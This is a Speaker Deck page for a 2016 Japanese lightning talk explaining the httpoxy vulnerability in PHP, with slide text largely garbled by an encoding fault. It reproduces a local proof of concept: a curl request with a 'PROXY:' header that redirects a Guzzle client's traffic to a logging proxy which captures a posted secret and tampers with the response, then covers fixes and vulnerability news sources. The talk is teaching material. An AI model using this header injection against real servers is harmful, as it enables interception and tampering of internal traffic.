$30 off During Our Annual Pro Sale. View Details »

初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

uzulla
July 20, 2016
Technology
10
5.7k

初心者むけhttpoxyとか脆弱性とかの話 at #PHPBLT 5

PHPBLT #5でほぼしゃべらなかったLTの資料です。

uzulla

July 20, 2016
Tweet

More Decks by uzulla

See All by uzulla
PHPerが ISUCONでやるべき事
uzulla
1
22
開発生産性は上がらない - N Ways to Reduce Development Productivity
uzulla
1
38
test is not a job
uzulla
0
330
あなたのPHPアプリ、ログはでてますか?あるいはログをだしてますか? / Are you writing a log? Or just out a log?
uzulla
15
5.5k
有名FWを採用する?しない? 令和5年におけるオレオレフレームの立ち位置 / To make with own framework or not do, that is the question
uzulla
2
830
May the PHP dev be with xdebug
uzulla
0
55
PHPの最高機能、配列を捨てよう!! / Throw away all PHP array now!!!
uzulla
10
9.6k
八王子からお届けするノベルティ - YAPC::Kyoto 2023
uzulla
0
600
即、New Relic / New Relic NOW!
uzulla
0
740

Other Decks in Technology

See All in Technology
VS CodeとPostmanを活用した効率的なAPI開発 / Efficient API development using VS Code and Postman
yokawasa
3
260
20年以上続くサービスの 管理画面リプレイスを行いながら 技術的負債と向き合った話
radkmb
0
2.1k
「極意本」サンプルコードをクラウド上で動かそう
upura
0
200
CloudNative_TrailMap_Study#2_20231114
tkhresk
1
110
技術コミュニティ参加のすすめ
minorun365
PRO
4
270
DMMプラットフォームにおける GKE を利用した プラットフォームエンジニアリングへの 取り組み
pospome
1
160
スクラムマスターやマネージャーのための信頼構築につながる傾聴の技術
kawagoi
6
2.8k
The future is already here – Mastering the challenges of the coming years
ufried
0
240
APIテスト導入から2年。アジャイルな組織で見えてきたmabl活用の道
bengo4com
0
1.9k
異なる思想で書かれたコードの統一に動く -Terraformの場合-
coconala_engineer
0
190
急成長スタートアップにおける技術的負債とトレードオフ・スライダー / Technical Debt and Trade-off Sliders in Fast-Growing Startups
codenote
2
2.2k
uGUI の自動操作の考え方と操作方法
orgachem
PRO
0
120

Featured

See All Featured
The Invisible Customer
myddelton
113
12k
jQuery: Nuts, Bolts and Bling
dougneiner
57
6.9k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
17
1.4k
It's Worth the Effort
3n
180
27k
Three Pipe Problems
jasonvnalue
89
9.3k
Happy Clients
brianwarren
91
6.1k
Sharpening the Axe: The Primacy of Toolmaking
bcantrill
12
1k
Automating Front-end Workflow
addyosmani
1354
200k
How to Create Impact in a Changing Tech Landscape [PerfNow 2023]
tammyeverts
0
270
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
240
20k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
239
1.2M
Understanding Cognitive Biases in Performance Measurement
bluesmoon
5
740

Transcript

  1. PHPBLT#5
    Httpoxyͱ͔ͷ࿩
    20160720
    uzulla

    View Slide

  2. ࣗݾ঺հ
    • Junichi Ishida aka uzulla
    • ͠ΐ΅͍ϑϦʔλʔʢϥϯεʣͰ͢
    • HachiojiͳΜͨΒͱ͔
    • ͳΜͨΒHacjioji in ඼઒ͱ͔

    View Slide

  3. Httpoxy
    • https:/
    /httpoxy.org/
    • ࡉ޻ͨ͠ϦΫΤετΛૹΔ͜ͱͰɺPHP͔Β֎෦΁ͷϦΫΤε
    τʹ͓͍ͯhttpϓϩΩγΛࢦఆͰ͖ΔՄೳੑ
    • ΞϓϦ͔Βଞͷαʔόʔ΁ͷhttp௨৴Λ౪ௌͰ͖ΔՄೳੑ
    • ͋Δ͍͸ɺվ͟Μ΋Ͱ͖ΔՄೳੑ
    • ΈΜͳௐࠪࡁΈͩΑͶʂʁ
    • ʢΈΜͳ஌͍ͬͯͨΒ਺ϖʔδඈ͹͢ʣ

    View Slide

  4. View Slide

  5. • ʮCLIͰΑ͋͘Δ࢓༷ʯͱʮCGIͷ࢓༷ʯͷিಥ͕ݪҼ
    • HTTP_PROXY؀ڥม਺ͰϓϩΩγΛઃఆͰ͖ΔCLIͷϓϩάϥϜ
    ͕Α͋͘Δ
    • ΢ΣϒΞϓϦʹ͸ʢ΄΅ʣແ༻͕ͩɺී௨ͷਓʢʁʣ͸PHPͰ
    CLIϓϩάϥϜΛॻ͘ͷͰɺҰ෦ͷϥΠϒϥϦ͕αϙʔτͨ͠ɻ
    • ͯ͞ɺCGIͷ࢓༷Ͱ͸ʢྫ͑͹ʣHOGEͱ͍͏ϦΫΤετϔομ
    ʔΛHTTP_HOGE؀ڥม਺ʹอଘ͢Δͷ͕ͩ…ɻ
    • ݁ՌɺʮPROXYʯϔομ͕དྷΔͱHTTP_PROXYͱ͍͏؀ڥม਺͕
    ઃఆ͞ΕɺϦΫΤετϔομ͔ΒϓϩΩγ͕ઃఆͰ͖Δʢʂʣ

    View Slide

  6. • CGIϦεϖΫτͳPHP͸mod_php΍fastcgi΋͜ͷ࢓༷
    • ͳ͓ɺPHPࣗମ͸௚઀͜ͷ੬ऑੑ͸Өڹ͠ͳ͍
    • օେ޷͖file_get_contents͸Өڹͳ͍
    • ͕Μ͹ͬͯ࡞Γ͜·ͳ͚Ε͹Өڹ͠ͳ͍ʼ͡Ό͋ͳΜͰʁ
    • HTTP_PROXYΛड͚ೖΕΔ୅දతͳϥΠϒϥϦͱͯ͠guzzle
    • 6.2.1Ͱमਖ਼
    • guzzle͸࠷ۙ͋ΒΏΔॴͰґଘϥΠϒϥϦͱͯ͠࢖ΘΕ͍ͯ
    ΔɺͳͷͰ࿩୊ʹͳͬͨͷͰͨ͠ʂ

    View Slide

  7. ͳ͓…
    • ઃఆͰ͖Δͷ͸HTTP_PROXY؀ڥม਺Ͱ͋ͬͯɺHTTPS_PROXY؀
    ڥม਺͸ࢦఆͰ͖ͳ͍
    • τϦοΫ্ɺHTTP_*͔͠ઃఆͰ͖ͳ͍ͷͰ
    • ͭ·Γɺ৐ͬऔΕΔͷ͸HTTP
    • ʢৗࣝతͳϥΠϒϥϦͳΒͶʂʣ
    • େ఍ͷϠόΠ৘ใ͸HTTPSͩΖ͏…ଟ෼…ɻ

    View Slide

  8. ΦνͱͳΔରࡦ͸
    • !΢Σϒαʔό౳ͰɺPHPͷࣄલʹϔομʔΛམͱ͢
    • !getenv('HTTP_PROXY')ͳͲͱ͍ͬͨίʔυΛແ͘͢
    • ίʔυΛ௚͢
    • ϥΠϒϥϦͷόʔδϣϯΞοϓ
    • ❌ʮίʔυઌ಄ͱ͔Ͱ؀ڥม਺্ॻ͖͢Ε͹͍͍ͷͰ͸ʁʯ
    ʮ࢒೦ͳΒແཧͳͷͰ͢ʯ

    View Slide

  9. ͜͜·Ͱ͸օ͞Μ͝ଘ͡
    • ʢ͖ͬͱ͜͜·Ͱશ෦ͷεϥΠυ͕εΩοϓʣ
    • ͱ͜ΖͰΈͳ͞Μɺීஈ͔Β੬ऑੑͷରԠͯ͠·͔͢ʁ
    • ʮࣗ෼Ͱʯௐࠪ΍ରԠͯ͠·͔͢ʁ
    • ʮࣗ෼Ͱʯීஈ͔Β৘ใऩूͯ͠·͔͢ʁ
    • ʢͳ͓ϑϦʔλʔ͸ݽಠͳͷͰ౰વηϧϑαʔϏε…ʣ

    View Slide

  10. ࢼͯ͠·͔͢ʁ
    • ࢼ͞ͳ͍ͰɺରԠࡦΛͱʹ͔͘ίϐϖͨ͠Γͯ͠·ͤΜ͔ʁ
    • ੬ऑੑ͸ࢼ͞ͳ͍ͱצҧ͍͢Δࣄ͕͋Δ
    • ௨ৗࣗ෼Ͱ࣮૷͢Δඞཁ͕͋Δ͕ɺPoC͕ެ։͞Ε͍ͯΔ͜ͱ
    ΋ଟ͍
    • Proof of conceptʢ֓೦࣮ূɺ࣮ূσϞʣ
    • ੬ऑੑΛ࠶ݱͤ͞ΔσϞίʔυ
    • ʢ࠷ۙࢮޠɿexploit codeʣ

    View Slide

  11. ࢼͦ͏ʂ
    • ࢼ͍ͯ͠Δਓ͕ଟ͔ͬͨΒεΩοϓʂ

    View Slide

  12. • PoC͸Ͳ͜ʹ͋Δ͔ʁ
    • CVE౳ʹඞͣهࡌ͞Ε͍ͯΔΘ͚Ͱ͸ͳ͍ɺͷͰ୳͢
    • ʮ࣏͕҆ѱ͘ͳΔ͔Βެ։͢Δͳʂʯͱ͍͏ਓ΋͍ΔͷͰ…
    • ͳ͓ɺΑ͘Θ͔ΒΜPoCʢ΍Exploitʣ͸ઈରʹ࣮ߦ͢Δͳʂʂʂ
    • CVEͱ͔ʹ৐ͬͯΔౕ͸େৎ෉ͩΖ͏͕ɺ໺ྑͷExploit͸ഁ
    յతͩͬͨΓɺόοΫυΞͩͬͨΓ͢Δ
    • ࠓճ͸httpoxy͕ެ։͍ͯͨ͠
    • https:/
    /github.com/httpoxy/php-fpm-httpoxy-poc

    View Slide

  13. // ݩͷίʔυ͸͜ͷΑ͏ͳײ͡
    // "guzzlehttp/guzzle": "~6.0"
    $client = new GuzzleHttp\Client();
    $client->request(
    'POST',
    'http://my-internal-microservice.example.com/',
    ['secret' => 'some-really-secret-string']
    );
    echo "Request sent\n";

    View Slide

  14. // ͦͷ··Ͱ͸࢖͑ͳ͍ͷͰɺίʔυमਖ਼
    // http://127.0.0.1:8002/api.phpʹػີσʔλ()ΛPOSTͯ͠ɺ
    // ؼ͖ͬͯͨσʔλΛecho͍ͯ͠Δ
    require 'vendor/autoload.php';
    $client = new GuzzleHttp\Client();
    $res = $client->request(
    'POST',
    'http://127.0.0.1:8002/api.php?himi=tsu',
    ['form_params' => ['secret' => 'I_AM_PHPER']]
    );
    echo $res->getBody();

    View Slide

  15. API(?!)Λ࡞੒
    // api.php
    echo "BLT!BLT!";

    View Slide

  16. ΞϓϦͱAPI(?!)Λىಈ
    $ composer install
    $ php -S 127.0.0.1:8001 index.php
    # ผγΣϧͰ
    $ php -S 127.0.0.1:8002 api.php

    View Slide

  17. ͨΊͯ͠ΈΔ
    $ curl 'http://localhost:8001/'
    BLT!BLT!
    • API͔ΒͷσʔλΛͱ͖ͬͯͯΔͷͰOK

    View Slide

  18. ѱҙ͋ΔProxyΛ༻ҙ͢Δ
    • ͝ՈఉʹProxy͕͋Δํ͸ෆཁ
    • Charlesͱ͔
    • (༨ஊɿcharlesݹ͍͠ɺ࠷ۙ͸ͳʹ͕ϋϠϦͳͷʁ)

    View Slide

  19. ѱҙ()͋ΔࡶͳproxyΛॻ͘
    $uri = $_SERVER['REQUEST_URI'];
    $body = file_get_contents('php://input');
    $method = $_SERVER['REQUEST_METHOD'];
    error_log($body);
    error_log(print_r($_SERVER,1));
    require 'vendor/autoload.php';
    $client = new GuzzleHttp\Client();
    $res = $client->request($method, $uri, ['body' => $body]);
    echo $res->getBody();

    View Slide

  20. ࡶͳProxyʹ͍ͭͯ
    • ੒ޭ͢ΔͱɺΫΤϦͳͲΛerror_logʹग़ྗ͢Δ
    • ద౰ʹproxyઌ͔Βऔಘ͖ͯͯ͠Ϩεϙϯε͢Δ
    ʢproxy͔ͩΒͶ…ʣ
    • ͜ͷίʔυ͸ࡶͰةݥͳͷͰ࣮ݧҎ֎ʹ͸ઈରʹ࢖͏ͳΑʂ
    • ʮContent-type?ͳʹͦΕ͏·͍ͷʁʯ

    View Slide

  21. ࡶͳproxy্ཱͪ͛
    $ php -S 127.0.0.1:8003 proxy.php

    View Slide

  22. ࣮ࡍʹ੬ऑੑΛςετͩʂ
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    BLT!BLT!

    View Slide

  23. • ʮ࢒೦͜ΕͰ͸͏͖͝·ͤΜʯ
    • ͳΜͱbuiltin server ͸੬ऑੑ͕ͳ͍ʂ͆
    • ͱ͍͏͜ͱͰɺ੿࡞apachehereΛ͔ͭ͏(໪࿦ͳΜͰ΋͍͍͚Ͳ)
    • https:/
    /github.com/uzulla/apachehere
    $ apachehere -p 8001
    DocumentRoot : /xxx
    php-cgi
    open : http://127.0.0.1:8001/

    [20/Jul/2016:01:49:18 +0900] 127.0.0.1 [200]: /index.php

    View Slide

  24. ϦτϥΠʂ
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    BLT!BLT!

    View Slide

  25. ੒ޭ͢Δͱproxyͷϩάʹ…
    [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
    [Wed Jul 20 02:01:43 2016] Array
    (
    [DOCUMENT_ROOT] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc
    [REMOTE_ADDR] => 127.0.0.1
    [REMOTE_PORT] => 53696
    [SERVER_SOFTWARE] => PHP 7.0.3 Development Server
    [SERVER_PROTOCOL] => HTTP/1.1
    [SERVER_NAME] => 127.0.0.1
    [SERVER_PORT] => 8003
    [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
    [REQUEST_METHOD] => POST
    [SCRIPT_NAME] => /api.php
    [SCRIPT_FILENAME] => /Users/zishida/Dropbox/talk/20160719PHPBLT5/php-fpm-httpoxy-poc/api.php
    [PHP_SELF] => /api.php
    [QUERY_STRING] => himi=tsu
    [HTTP_HOST] => 127.0.0.1:8002
    [HTTP_PROXY_CONNECTION] => Keep-Alive
    [HTTP_USER_AGENT] => GuzzleHttp/6.2.0 curl/7.43.0 PHP/7.0.3
    [CONTENT_TYPE] => application/x-www-form-urlencoded
    [HTTP_CONTENT_TYPE] => application/x-www-form-urlencoded
    [CONTENT_LENGTH] => 17
    [HTTP_CONTENT_LENGTH] => 17
    [REQUEST_TIME_FLOAT] => 1468947703.6871
    [REQUEST_TIME] => 1468947703
    )

    View Slide

  26. [Wed Jul 20 02:01:43 2016] secret=I_AM_PHPER
    [Wed Jul 20 02:01:43 2016] Array
    (
    snip
    [REQUEST_URI] => http://127.0.0.1:8002/api.php?himi=tsu
    • ͜ͷΑ͏ʹɺproxy.phpͷϩάʹͰͯ͘ΔΘ͚Ͱ͢Ͷɻ

    View Slide

  27. proxyΛमਖ਼͢Ε͹…
    // proxy.php
    //echo $res->getBody();
    echo "ീԦࢠʂീԦࢠʂ";
    • ͱमਖ਼ͯ͠
    $ curl 'http://localhost:8001/' -H 'PROXY: http://127.0.0.1:8003/'
    ീԦࢠʂീԦࢠʂ
    • վ͟Μ੒ޭͰ͢Ͷʂ

    View Slide

  28. ͱ͍͏͜ͱͰɺ
    • ҆શͷͨΊʹbuiltin serverΛ͔͓ͭ͏ʢҧ͏ʣ
    • ͱʹ͔͘PoCΛಈ͔ͨ͠Γ࡞ͬͯΈΔͷ͸ॏཁɺษڧʹͳΔ
    • ʮapachehere͕ศརμφʔɺDockerʁVagrantʁ͠ΒΜʂʯ
    • ʮ͑ͬɺPHPͷόʔδϣϯ͕ݹ͍ʁ͢·Μʂʯ

    View Slide

  29. ͋ͱɺ৻ॏʹͶʂ
    • ύονόʔδϣϯΛ؁͘Έͯ͸͍͚ͳ͍
    • ʮGuzzleͷ্͛ͨΒɺGAEͰ͏͔͝ͳ͘ͳͬͨʢ࣮࿩ʯ
    exception:
    php_sapi_name() has been disabled for security reasons.
    It can be re-enabled by adding it to
    the google_app_engine.enable_functions ini variable
    in your applications php.ini
    • ʮGAE ͕ѱ͍ ͷ࢓༷Ͱ͸ʁʯʮ͔ͨ͠ʹʯ

    View Slide

  30. Ͱ͸υίͰ஌Δ͔ʁ
    • օ͞Μ͸Ͳ͜Ͱ஌ͬͯ·͔͢ʁ

    View Slide

  31. ໰୊Λ΢Υον͠ଓ͚Δ
    • ໘౗͕ͩ࢓ࣄͩʂ
    • TwitterͳͲSNSͰ஌Δ
    • CVEͳͲΛߪಡ͢Δ
    • χϡʔεαΠτΛߪಡ͢Δ
    • ެࣜϦϦʔεΛߪಡ͢Δ

    View Slide

  32. TwitterͳͲSNS
    • ଎ใੑ͕ߴ͍ɺ5ׂ͘Β͍͸͜͜ͰଘࡏΛ஌ΔࣄʹͳΔ
    • ʢPHPͷਓͰ͸ͳ͆͘ʣJSɺGoɺPerl΍Πϯϑϥํ໘ͳͲͷਓΛ
    ϑΥϩʔ͢Δͱྑ͍ʢݸਓతͳओ؍ʣ
    • ৄ͍͠ਓ͸౰વ࿩୊ʹ͢Δ͜ͱ͕ଟ͍͠ɺ
    ʢΘ͔͍ͬͯΔͷͰʣҰ࣍৘ใʹϦϯΫ͍ͯ͠Δ͜ͱ͕ଟ͍

    View Slide

  33. ηΩϡϦςΟʹಛԽͨ͠χϡʔεαΠτ
    • http:/
    /jvn.jp/report/
    • JVNɺ೔ຊޠɺ·ͣ͸͚ͩ͜͜Ͱ΋ྑ͍ʢͱࢥ͏ʣ
    • Feed΋͋ΔΑ
    • https:/
    /www.jpcert.or.jp/
    • JPCERTɺϝϧϚΨ΋͋ΔΑʂ

    View Slide

  34. • https:/
    /nvd.nist.gov/download.cfm
    • NISTɺӳޠɺCVEͷFeed͕͋ΔͷͰศར
    • CVE͸΄΅Ұ࣍৘ใͱͯ͠ѻͬͯྑ͍ʢͱࢥ͏ʣ
    • https:/
    /security.sensiolabs.org/database
    • PHPϥΠϒϥϦͷ৘ใɺFeed͕͋ΔͷͰศར

    View Slide

  35. ҰൠతͳχϡʔεαΠτ౳
    • ҰൠతͳITܥχϡʔεαΠτ͸…ຊจ͸ಡ·ͣʹ͙͢ʹϦϯΫઌ
    ͷҰ࣍৘ใ΁ݴͬͨํ͕ྑ͍…ɻ

    View Slide

  36. • reddit֤छɺ଎ใੑߴ͍͕ίϝϯτ͸͙͢ʹ৴༻͠ͳ͍Α͏ʹ
    • https:/
    /www.reddit.com/r/netsec
    • https:/
    /www.reddit.com/r/sysadmin
    • https:/
    /www.reddit.com/r/PHP
    • hackernewsɺ଎͍Μ͚ͩͲ͙͢ʹྲྀΕ͍ͯ͘
    • https:/
    /news.ycombinator.com/news

    View Slide

  37. ެࣜαΠτ
    • ಛʹࡉ͔͔͔͘ͳ͍Ͱ͚͢Ͳ
    • ࣗ෼͕͔͍ͭͬͯΔϑϨʔϜϫʔΫ΍ϥΠϒϥϦ΍PHPͷϦϦ
    ʔεͱ͔͸Έͯ΋ྑ͍ͷͰ͸ʁʁ

    View Slide

  38. blog
    • ࣄྫΛ·ͱΊͯΒͬ͠ΌΔαΠτͱ͔
    • ηΩϡϦςΟاۀͷϒϩά΋Α͍
    • ౰વ͚ͩͲɺ໢ཏੑ͕ͳ͍
    • ʮ୯ޠʯΛ஌ͬͯɺ୳͔ͯ͠ΒͨͲΓண͘ͷͰ΋Α͍
    • झຯ͕ͰΔͷͰলུ

    View Slide

  39. Branded Vulnerability ͳαΠτ
    • ࠷ۙ͸Ωϟονʔͳ໊લ͕෇͘ɺHttpoxy΋ͦ͏
    • GHOST,FREAK,POODLE౳ʑ
    • ·ͱΊαΠτΈ͍ͨͳ΋ͷɺγΣΞ͠΍͘͢ΩϟονʔͳΞΠ
    ίϯ͕͋ͬͨΓͯ͠Α͍
    • ଟ͘ͷ৔߹CVEΑΓ͸Θ͔Γ΍͍͢͠ɺͱΓ͔͋͑ͣ͜͜ΒΑΜ
    Ͱ΋OK͕ͩɺӳޠͰ͢ɻ
    • ʮ͜Ε͕͋Δ͔Βॏେʂʯͱ͍͏༁Ͱ͸ͳ͍ɺٯ΋·͔ͨ͠Γ

    View Slide

  40. ৘ใΩϟον·ͱΊ
    • ΢Υονʹ͸RSSͱϝϧϚΨ͕ศརʂSNS͚ͩͩͱ࿙ΕΔʂʢओ
    ؍Ͱ͕͢ɺΈΜͳ͕PHPͷ͜ͱΛؾʹͯ͠ΔΘ͚Ͱ͸ͳ͍͆ʣ
    • JPCERTͱJVN͘Β͍͸ొ࿥ͯ͠Α͍ͷͰ͸
    • Branded VulnerabilityͳαΠτ͕͋Ε͹·ͣνΣοΫ
    • ӳޠ͕ॏཁʢʣ
    • ࿨༁΍ղઆهࣄ͸Ұ൩ೋ൩͘Β͍ͰདྷΔͷͰɺΑ͘Θ͔Βͳ͚
    Ε͹߄ͯͣʹਖ਼࠲ͯ͠଴ͭ͜ͱ

    View Slide

  41. That's all folks!
    • ੬ऑੑ͸ࣗ෼Ͱ΋ͨΊͦ͏ʂ
    • χϡʔεΛͪΌΜͱݟΑ͏ʂ
    • ͪΌΜͱ੬ऑੑΛ೺Ѳͯ͜͠ʂ
    • Httpoxyɺ͋Μ·Γ೿खͳ੬ऑੑ͡Όͳͯ͘Α͔ͬͨʂ
    // enjoy !
    $ grep -r HTTP_PROXY /your/codes/

    View Slide